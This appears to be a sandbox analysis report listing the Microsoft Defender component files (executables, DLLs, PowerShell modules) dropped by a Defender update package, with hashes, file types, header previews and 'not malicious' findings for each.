Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s.v. .v. .v. U..!.v. ...!.v. ...!.v. ...!.v. ..U .v. .v. .w. ...!.v. U..!.v. U..!.v. U.9 .v. U..!.v. Rich.v. ........PE..d...F[.S.........." .................^...............................................j....`A........................................0...H...x........`..X....P.......p... ...p..........p...................h...(...0...8...............0............................text...R........................... ..`.rdata..*W.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...X....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpDlpCmd.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	372176
Entropy (8bit):	5.810540726487847
Encrypted:	false
SSDEEP:	6144:SqKvKD0BvxUWJsoyvdnja6lHfF2tZLmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVi:jyBWGxyvmR1
MD5:	9DA1C405AF787EFBAF735B76388F867F
SHA1:	7C9F2DD2C72A15B2954534BB7021C9DB3F850DA1
SHA-256:	7E7180B5534BE4BF2E531DCCE4BD8C0CB55EEC93759625283A162C0F6149464F
SHA-512:	66190E1EA2D6FA7EE048D204746216B8C8146C0F17114CA1651B566632F32970F2F6113131338D96D43FDCA33A9266D142016DCD6369F27CE6657DF12FB823E5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.8...k...k...k7v.j...k7v.j...kkq.j...kkq.j...k.{sk...kkq.j...kkq.k...kkq.j...k...k...k7v.j...k7v.k...k7v.j...kRich...k................PE..d...V..F.........."..................9.........@....................................y................ ......................................4...@....p.......P..<........-......l...P...p.......................(...`...8...............h............................text...E........................... ..`.rdata...}..........................@..@.data........0.......0..............@....pdata..<....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc..l............p..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpEvMsg.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	143608
Entropy (8bit):	3.8404828233814126
Encrypted:	false
SSDEEP:	768:7r/gwWulQnuBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjd4KqgmXyGgR1PRGzm:QIBkG2usKoHPim
MD5:	E6BA4B06A514B05F1A6F67E02776CB12
SHA1:	40CE66816509483AD45B8B6DE05D5F9AC23671CB
SHA-256:	3E69F409180506A6636CA8F0620AB0CC9B57F1393AC5986CC8BBE50BEF12C9C2
SHA-512:	C8DDB425AEA945C86742ED8E8940E655BC24AB66EE4FAEDB7F29FA7A187809DABD326A529777691481E53C55D5119402D4016CDED33919840AC98D9C636C3022
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d................." ......................................................................`A......................................................... ................... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpOAV.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	495848
Entropy (8bit):	6.009124528357715
Encrypted:	false
SSDEEP:	6144:l7A3ZwUGB8s0MYG75D5DU3b9EV0ShqJULr0XVCOPmiTVVmVVV8VVNVVVcVVVxVVV:lk3a7J5DS9EV0MqJULrkkMo
MD5:	507A1C4DC135D31E60E46C911F518352
SHA1:	94D0E5C74AD632CDE21A967FD6A06999153B6CC7
SHA-256:	07AA7775DEC86AFEF867C3B902BCF47CCB36E224433171EB6C4C0E3D80F753AB
SHA-512:	FD980B28BA5E60536D695707716B4AC5B2AD63EEF1AF82534B326E2DBF6CA349DDA189C70CAF638C2AB6C3D6EB187F3C613FC5097C645C4272D9C60E8E2BE305
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........M...#...#...#.v. ...#.."..#..."..#..'..#.. ...#..&.>.#.v.#...#.v.*..#.v.....#.v.!...#.Rich..#.........PE..d...A............." ..........................._..........................................`A................................................D...x............`...#...p... ......t.......p....................8..(...P7..8............8..p............................text..."........................... ..`.rdata..............................@..@.data....0... ... ... ..............@....pdata...#...`...0...@..............@..@.rsrc................p..............@..@.reloc..t............`..............@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpRtp.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1478904
Entropy (8bit):	6.324410065456569
Encrypted:	false
SSDEEP:	24576:43IcInwFd0DDgUkXbikt2m94TdJdiLyvBW+IYHMb1ie:4YrvDDgsm2mWJdiLiBWZQMb1ie
MD5:	EABFAF1CE6CB8843DA42FBA01E8BF069
SHA1:	ADBD3EF5C4EBD0D395B157489A3B5D34EAB8CFFF
SHA-256:	CA99B8EAA6ED8C706590551BE37107D027BBD53CC9E52805446ADF59B3AEDC1E
SHA-512:	AFF68BBE9B8A086E2E49BDBC864DE8FA8E5990F23F38B385CDEE56C189C52088B24DD492A779EA2ECDD751AB682B81041B674E854DCB190F8EBD10079FC1F68C
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H...)...)...)..M\...)..M\...)...[...)...)...(...[...)...[...)...[...)..M\...)..M\...)..M\W..)..M\...)..Rich.)..........PE..d....t`.........." ...........................^..........................................`A........................................P...d............ ...B...p.......p... ...p......`...p.......................(......8...........(.......4... ....................text....t.......................... ..`.rdata..^V.......`..................@..@.data...<p.......`..................@....pdata.......p.......P..............@..@.didat..X...........................@....rsrc....B... ...P..................@..@.reloc.......p... ...P..............@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSvc.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3113208
Entropy (8bit):	6.304406527619417
Encrypted:	false
SSDEEP:	49152:RThS41BElO7Jyf4HtxHnXXnh/vz1ztLm0exGP9lbw6ieBh4wBg:nR/EE7ofGx1fFxg
MD5:	0618D6AA4B96E666F1C3B79CA1531187
SHA1:	037AA87516FA27ADAE6499FFE314601262FE8E8A
SHA-256:	89FD82BABFEE76643CA0F3DC4730302575E2BCCB00F744090D9E253A8CD9EE53
SHA-512:	457ECDAF9CC2AB3E6E26F8899831979AC5B1D0D59483CFC30A815280CD362173E0E349F5CC28F45DE25E2AB9DF4731768CF06A0C8E66E595847A67A43833F481
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........!.\Z@..Z@..Z@...5..X@...5..[@...2..H@...2..H@...2..S@..S8*.M@..Z@...B...2..j@...2D.X@...5..[@...5..?A..}...]@...5F.[@...5..[@..RichZ@..........................PE..d................." ......"....................\............................../......;0...`A.........................................B,.d....C,.h.......`....p-.d1...`/.. ...P/.h4.../(.p.....................#.(.....".8.............#......;,.@....................text....q"......."................. ..`.rdata........".......".............@..@.data.........,.......,.............@....pdata..d1...p-..@...@-.............@..@.didat..............................@....rsrc...`...........................@..@.reloc..h4...P/..@... /.............@..B........................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUpdate.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	151800
Entropy (8bit):	5.674686738982597
Encrypted:	false
SSDEEP:	1536:LJ9Z2WHykjzKo81vmwUGKyBA3LTqjSL0fieoeKTePoWQbzkDHP+W:LJ9b3Kd1vm/GymuL0fieoeKTePovbzsT
MD5:	BA4E1FC83B68F72927F58BBFA064C294
SHA1:	F0F57EB79F2478D7BFE4AD4D18361D2F09E3E03A
SHA-256:	23C224794D0342F3C97D6F104B40465A8C314186DD3A9F0CBBC9A9441700AE83
SHA-512:	789D52FF5491488B162422BFB4A6D4FB9D40E905B6A370AD2A9F20BA095B9485D5AF07EB8CD660D2BF4F4906DC1FA68ACD223ACFE913FC5F99F78FBDA56DDCA4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ew9{!.W(!.W(!.W(.cT) .W(.cV)#.W(.dV)0.W(.dS),.W(.dT)&.W((n.(/.W(!.V(q.W(.dR)..W(.cW) .W(.c^)n.W(.c.( .W(.cU) .W(Rich!.W(........................PE..d.... 3".........." ..... .....................h.............................@............`A............................................L...\........ ...............0... ...0......@...p...................xU..(...@T..8............U...............................text............ .................. ..`.rdata..D....0.......0..............@..@.data... ...........................@....pdata........... ..................@..@.rsrc........ ......................@..@.reloc.......0....... ..............@..B................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpUxAgent.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	545016
Entropy (8bit):	5.974310663865527
Encrypted:	false
SSDEEP:	6144:j/zDRgR8KZHQf7uiJRpqVCy6H5gAH2IGCXl/2UWYbyKHiTVVmVVV8VVNVVVcVVVB:7zDRvDp/qVC1gAH2IGCXlPh4S
MD5:	68228D20DFAA033D246B8BED272CF92C
SHA1:	F351C4991FFC3190131B279E06A0F58856EBC375
SHA-256:	C44F961691C4F91AD370985D5EB281F843EB5DCF6F5EC98D9C9A509E789CB7E8
SHA-512:	2B327EB01858A1B7C80275B9F5B3B642592DFE0AD357B3C65D7C483D0CB59178CB33A245408BC0A962F28594B504C0F17521F567A8AD5CA981A770CC9B857916
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>7._Y.._Y.._Y..Z.._Y..X.._Y.Y-X.._Y.Y-].._Y.Y-Z.._Y..'.._Y.._X..^Y.Y-\.._Y.Y-..._Y..Y.._Y..P.._Y....._Y..[.._Y.Rich._Y.........PE..d.....2.........." .................&.......................................0......;......A................................................8........0..\........#...0... ... ...... ..p...................X...(... ...8...............x............................text...%........................... ..`.rdata..x........ ..................@..@.data....-.......0..................@....pdata...#.......0..................@..@.rsrc...\....0.......0..............@..@.reloc....... ....... ..............@..B........................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpEng.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	128392
Entropy (8bit):	5.775533067291842
Encrypted:	false
SSDEEP:	3072:gPkBbbztTh/9kcexTIJO0gj7KTe9q7CTttUSkh6e5:gPIfRh/9kUJDZuttUNse
MD5:	15D205854CA62B75C0BF447F9DD8119D
SHA1:	F1A1874738E310CE76D37C1045EA00C0CEFCF64B
SHA-256:	B815A94D49CC0E8DB03456CBBAFB4A052F481531F8768CE704A2A012FD84B7AB
SHA-512:	A6B324F884525875849994EE2247B98BF3D389A49B4E387A578F05E92FB754CEF6AD917D5CE201A40E88FDAA0A117C6D23EB5B7FEA6F4765F48EE957AB471B85
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.U.L...L...L..W9...L...>...L...>...L...4...L...>...L...>...L...L...M..W9...L..W9y..L..W9...L..Rich.L..........PE..d....MCD.........."...........................@.....................................N......................................................tj..................\|........%......`....<..p....................$..(...."..8...........@$...............................text...B........................... ..`.rdata...Y... ...`... ..............@..@.data...............................@....pdata..\|........ ..................@..@.rsrc...............................@..@.reloc..`...........................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MsMpLics.dll Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20728
Entropy (8bit):	4.482228069977977
Encrypted:	false
SSDEEP:	192:7rPEnfKWgFHWaALc2Fu462TNOxjB1RDBQABJpI4BOk9qnajR5d:7rPEniWgFHWa1MJERDBRJpxBhl95
MD5:	7B842DAC975E04C90F9B23B7D04B5160
SHA1:	DE370B7FBC16E36955A700D472BAD83A029F2B52
SHA-256:	61D412008B89D3B931BC9E8AD731F792DD9EF2D2F147916103B8F9392CF8D501
SHA-512:	7D7891BC65B67D9FB9CBA00953A3B86FEFD987EAE2718C79C36B17E1DDAC054A40E3DDE7AF662C8126C2B8440F172C7DF01C24469A8C0D57BD719255BD432F72
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..d....I?.........." ......... ...............................................0......P.....`A......................................................... ...............0... ..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\NisSrv.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2855512
Entropy (8bit):	6.440503543687848
Encrypted:	false
SSDEEP:	49152:JwgA1BydF9JuPAdoZ6Ig1hUcN2DARtfp+Q4s+W8:JqTi7cW
MD5:	054F919445EDBC999989A1413FD87437
SHA1:	597196C3A4C1CDC1DB5F1A0C39C37CB6C4FC1FB1
SHA-256:	A124EBD9240AAA542962CB2A1059B6315E9F2183CBFD08B4E8029EE15B6A009F
SHA-512:	38C530ABE67F12EEE0A6734CE51FCC24C0CD81AAFD232137A41E221B79FEE9BA07253DA7F50EBEE0E9BFF0FEBCC547C1CCFAE4AE7B222A13B8DC9A3097E2ED50
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.C............C\|......C\|.......{.......{.......{.......q;..............{.......{U.............C\|..i...C\|W.....C\|......Rich............................PE..d....\k..........."......0#..........]!........@............................. ,.......+...`...................................................(.,.....+.H....`..P....+.X.....+..0.. .$.p...................h.#.(...0.#.8.............#.0....\|(......................text...?'#......0#................. ..`.rdata...i...@#..p...@#.............@..@.data...@.....(.......(.............@....pdata...P...`..`...P).............@..@.didat........+....................@....rsrc...H.....+....................@..@.reloc...0....+..@....*.............@..B................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\Defender.psd1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13827
Entropy (8bit):	5.952601509916055
Encrypted:	false
SSDEEP:	384:6B7YQ0ExG5Ju4mSFCsCow7+xPcgGywK85lbkn+uwgGhF887:4YQ0Ec5Ju4mweozx0gGyu5Sn+uDuF8c
MD5:	9346D71D826DC7B6580C6206FD1A272E
SHA1:	21B45677AE39E36928CC1DE58958350CF7B49FE7
SHA-256:	EE3344F2D9FE64E0593B1DCE5FC4743D4891DAA6528A0650C41ED0D3F455D48E
SHA-512:	FD976F99CF3B47D6D9E17CEEBF5322C2F9583FA0F9D65E3C6D5144926911861DA3B4E57BD4E72CF3DBF7826BE5B5EF107BAEEB0C1DDF433BE4020B91D03467C9
Malicious:	false
Preview:	@{.. GUID = 'C46BE3DC-30A9-452F-A5FD-4BF9CA87A854'.. Author="Microsoft Corporation".. CompanyName="Microsoft Corporation".. Copyright="Copyright (C) Microsoft Corporation. All rights reserved.".. ModuleVersion = '1.0'.. NestedModules = @( 'MSFT_MpComputerStatus.cdxml',.. 'MSFT_MpPreference.cdxml',.. 'MSFT_MpThreat.cdxml',.. 'MSFT_MpThreatCatalog.cdxml',.. 'MSFT_MpThreatDetection.cdxml',.. 'MSFT_MpScan.cdxml',.. 'MSFT_MpSignature.cdxml',.. 'MSFT_MpWDOScan.cdxml',.. 'MSFT_MpPerformanceRecording.psm1'.. ).... FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml').... FunctionsToExport = @( 'Get-MpPreference',.. 'Set-MpPreference',.. 'Add-MpPreference',.. 'Remove-MpPreference',..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpComputerStatus.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	13946
Entropy (8bit):	5.978353470104296
Encrypted:	false
SSDEEP:	384:PX0m6YBOzHQV80tQEFMxOQhCLyTmSKXElIOhalPvnAQEYhW:v0m6YQzHY80tQpOQYLy6SKkIZFvnAQhU
MD5:	58DF8D38469AF7353B672A6F145994DC
SHA1:	DDC641F88A0B3452366CB920306CC3A90961A3C0
SHA-256:	A63B944CF4FB3DB7F758F7E4D94126ABE99916127E451E0C139D71E94744084A
SHA-512:	67B82A79DB97641976C942C448DF9D99317FF5CDC0BE3A1DB1CCA04C3BB8CE3832238E031D22E06CAE4E8ADD3BAB88CEEE29613680C8F33F197599D786334295
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpComputerStatus">.. <Version>1.0</Version>.. <DefaultNoun>MpComputerStatus</DefaultNoun>.... <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. .. </GetCmdletParameters>.. </InstanceCmdlets> .. </Class>.. ..</PowerShellMetadata>........ SIG # Begin signature block -->.. MIIhZwYJKoZIhvcNAQcCoIIhWDCCIVQCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCCGKubREngV5EF -->.. DodK5brTAqlkaVHav/M+SkqGWqFKKqCCC14wggTrMIID06ADAgECAhMzAAAIMJFU -->.. sm0DDuykAAAAAAgwMA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD -->.. VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy -->.. b3NvZnQgQ29y

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceRecording.psm1 Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	39934
Entropy (8bit):	5.64362105596826
Encrypted:	false
SSDEEP:	768:yFAwQAuFiCFivo1BWMmr8OGPDKQxV3LqIYQ0Ec5Ju4mweS0+dgGyTi5Sn+UuHA:y14cC4vo1BWMmr8OGPDKQxV3LqY/fSKR
MD5:	CBA32A98D0EC2D6CCCD3306BFF7AD3D2
SHA1:	D8F98682DC20E7AD744DE5208C0A472FCB3A33C9
SHA-256:	B77C1F9B9263345F34FE32EED15BD8E3925D378CAEF5D83FEB49275447BCCED6
SHA-512:	9426238394A6043D1A16E1CDEDA953DBD5C6DF8C7D2DBA3A3F34C3E5F963927A1C9791869E4ACE96F670921827E95D9BAF30544D558C521BD01C0E5AC7CB6F61
Malicious:	false
Preview:	## Copyright (c) Microsoft Corporation. All rights reserved.....<#...SYNOPSIS..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans......DESCRIPTION..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans. These performance recordings contain Microsoft-Antimalware-Engine..and NT kernel process events and can be analyzed after collection using the..Get-MpPerformanceReport cmdlet.....This cmdlet requires elevated administrator privileges.....The performance analyzer provides insight into problematic files that could..cause performance degradation of Microsoft Defender Antivirus. This tool is..provided "AS IS", and is not intended to provide suggestions on exclusions...Exclusions can reduce the level of protection on your endpoints. Exclusions,..if any, should be defined with caution......EXAMPLE..New-MpPerformanceRecording -RecordTo:.\Defender-scans.etl....#>..function New-MpPerformanceRecording {.. [CmdletBinding()].. par

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceRecording.wprp Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text
Category:	modified
Size (bytes):	4971
Entropy (8bit):	4.542570045638256
Encrypted:	false
SSDEEP:	96:aAPEP3EPGEPJuDhDEMTRBTCq6IQEPvAwWSJNLKI+EPZMhkvyXHkJi2eEPZMUkvy/:aAcPUPpPJfMTRBTr6ILPvAwW6NRPZMh2
MD5:	990729AD92C1325C42B04BC975ECBD57
SHA1:	1CDBE901753CCE8D933DF8D50507CE16A25AA428
SHA-256:	E796454FEE4CF17EFDC25DB5FEEF00A5D7C1B335E6C4B4FE996E8AD7CAB01BC8
SHA-512:	EA0BCD6122068DA9412E5195C7AA3017C187790C790197AC5AF129F3ACF6C23780169C0165627E5C55CB3B99E6931CB18A42E61701C647FF07EAF6DA2740DAEB
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" standalone='yes'?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Defender for Endpoint" Team="Microsoft Defender for Endpoint" Comments="Microsoft Defender for Endpoint Scan performance tracing" Company="Microsoft Corporation" Copyright="Microsoft Corporation">. <Profiles>. System Providers -->.. <SystemProvider Id="SystemProvider_Scans_Light">. <Keywords>. <Keyword Value="CpuConfig" />. <Keyword Value="ProcessThread" />. <Keyword Value="ProcessCounter" />. </Keywords>. </SystemProvider>.. <SystemProvider Id="SystemProvider_Scans_Verbose" Base="SystemProvider_Scans_Light">. <Keywords Operation="Add">. <Keyword Value="Loader" />. <Keyword Value="SampledProfile"/>. </Keywords>. <Stacks>. <Stack Value="SampledProfile"/>. </Stacks>. </Syste

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPerformanceReport.Format.ps1xml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	61966
Entropy (8bit):	4.530280013007693
Encrypted:	false
SSDEEP:	768:Bw2C10m6YQzHY80tQcd02cYVWVc80Bv/C:Bw2CTVtZk
MD5:	C9734A297293CCE204D369DD392EDDC9
SHA1:	83C091027F5BE029364DBB6C9D32BB294BC6579A
SHA-256:	CDF89F9602942969AE0493769EAC7DAA8022A1E8295D49403F1206615F92071A
SHA-512:	C474FB8F33E56DE45CB481CF921C9C21019F7610A35405BF16736A8A9C51901E750427E73271580FD1D169271DEB24A4BF1DFF130B76F26870EB4A5BE6201A7F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Configuration>.. <ViewDefinitions>.. <View>.. <Name>default</Name>.. <ViewSelectedBy>.. <TypeName>MpPerformanceReport.Result</TypeName>.. <TypeName>Deserialized.MpPerformanceReport.Result</TypeName>.. </ViewSelectedBy>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <ExpressionBinding>.. <PropertyName>TopFiles</PropertyName>.. <ItemSelectionCondition>.. <ScriptBlock>($_ \| gm -Name:'TopFiles' -MemberType:NoteProperty).Count -gt 0</ScriptBlock>.. </ItemSelectionCondition>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <NewLine />.. <Text>TopFiles</Text>.. <NewLine />.. <Text>========</Text>..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpPreference.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112029
Entropy (8bit):	4.059259917659887
Encrypted:	false
SSDEEP:	768:5ouSOD2TIBNoNejxo98U0m6YQzHY80tQ4TQWjL+6SNSIZFvnAStOp:5pSODnBNUejx3mVt1LBuA7
MD5:	710B025F9E1944FDB020F27389A2E8B3
SHA1:	C8CB55361A6F483CD6B464C5364ED091AFE46DD3
SHA-256:	AA9021CFDC42493E2A759BAD0159001FFB12110FF83CD16021E57570E6402805
SHA-512:	C01AD9EB3B6394192E69F3C14A9BB5B266F04213B687D754E41D8DA080F2BFD3333ED970A4EBC04E0B657ECF7DBA8D7C44F2AC99857DA5A0A25E05FE3A79329E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="root\Microsoft\Windows\Defender\MSFT_MpPreference" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpPreference</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. </GetCmdletParameters>.. </InstanceCmdlets>.... <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Set" />.. <Method MethodName="Set">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ExclusionPath">..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\Powershell\MSFT_MpScan.cdxml Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15262
Entropy (8bit):	5.965807864910325
Encrypted:	false
SSDEEP:	384:7DORD5N4I0m6YBOzHQV80tQEFl3uN+HzbycVZ1gX5BRpBbpm39B4:K0m6YQzHY80tQpNWfgBHBo39B4
MD5:	7528936578CAEAEFE7B398C8EF4E0A47
SHA1:	9BBABA934E9C442A4630233D3BE04A4D4333E352
SHA-256:	A51C86EFD506A132274C37E288B9B697BC865F14D6D6451DA7399C7B5F36751F
SHA-512:	13D7B389428D07A7D33CBC0276919A601C686CF4A0E99059AF1D81AC0784EE61DFC5354E80D3D6E2B6E801769968980B828ACC5DC1885E6CBE73A2941D3823AC
Malicious:	false
